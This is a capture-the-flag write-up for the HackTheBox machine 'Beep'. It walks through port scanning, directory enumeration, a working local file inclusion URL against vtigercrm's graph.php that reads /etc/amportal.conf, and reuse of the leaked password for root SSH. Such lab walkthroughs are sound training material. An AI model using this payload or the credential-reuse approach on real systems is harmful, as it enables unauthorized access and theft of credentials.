[HackTheBox] Beep

Beep is an easy machine that requires basic enumeration knowledge to complete it. It requires exploitation of simple LFI vulnerability to get root which makes it very interesting while staying simple.

Summary

  • Website reveals an Elastix installation.
  • Enumerate the website to find vtigercrm directory.
  • Exploit LFI in graph.php file to get the password.
  • Login to root through ssh using the found password.

Recon

Port Scan

nmap -n -sV -p- -T 5 -Pn 10.10.10.7

PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open     smtp       Postfix smtpd
80/tcp    open     http       Apache httpd 2.2.3
110/tcp   open     pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open     rpcbind    2 (RPC #100000)
143/tcp   open     imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open     ssl/https?
878/tcp   open     status     1 (RPC #100024)
993/tcp   open     ssl/imap   Cyrus imapd
995/tcp   open     pop3       Cyrus pop3d
3306/tcp  open     mysql      MySQL (unauthorized)
4190/tcp  open     sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open     upnotifyp?
4559/tcp  open     hylafax    HylaFAX 4.3.10
5038/tcp  open     asterisk   Asterisk Call Manager 1.1
10000/tcp open     http       MiniServ 1.570 (Webmin httpd)

HTTP (Port 80)

When we go to https://10.10.10.7/, we are presented with an Elastix login page. There are multiple exploits for Elastix and I needed to enumerate a bit more to find out which one to use.

Quick directory enumeration revealed the vtigercrm directory.

ffuf -w /usr/share/dirb/wordlists/big.txt -fc 403,404 -u https://10.10.10.7/FUZZ

admin                   [Status: 301, Size: 309, Words: 20, Lines: 10]
configs                 [Status: 301, Size: 311, Words: 20, Lines: 10]
favicon.ico             [Status: 200, Size: 879, Words: 6, Lines: 1]
help                    [Status: 301, Size: 308, Words: 20, Lines: 10]
images                  [Status: 301, Size: 310, Words: 20, Lines: 10]
lang                    [Status: 301, Size: 308, Words: 20, Lines: 10]
libs                    [Status: 301, Size: 308, Words: 20, Lines: 10]
mail                    [Status: 301, Size: 308, Words: 20, Lines: 10]
modules                 [Status: 301, Size: 311, Words: 20, Lines: 10]
panel                   [Status: 301, Size: 309, Words: 20, Lines: 10]
recordings              [Status: 301, Size: 314, Words: 20, Lines: 10]
robots.txt              [Status: 200, Size: 28, Words: 3, Lines: 3]
static                  [Status: 301, Size: 310, Words: 20, Lines: 10]
themes                  [Status: 301, Size: 310, Words: 20, Lines: 10]
var                     [Status: 301, Size: 307, Words: 20, Lines: 10]
vtigercrm               [Status: 301, Size: 313, Words: 20, Lines: 10]

Exploit

THIS exploit uses a local file inclusion vulnerability in graph.php file located in this directory.

Quick proof of concept:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

In the config file we got using this exploit we can see many credentials. Whenever a password was specified, the default one was commented out and replaced with a new one. The problem is… THEY ARE ALL THE SAME!

Privilage Escalation

After a bit of trial and error, I found out that the new password (from the config file) just worked while trying to login to root through ssh.

ssh root@10.10.10.7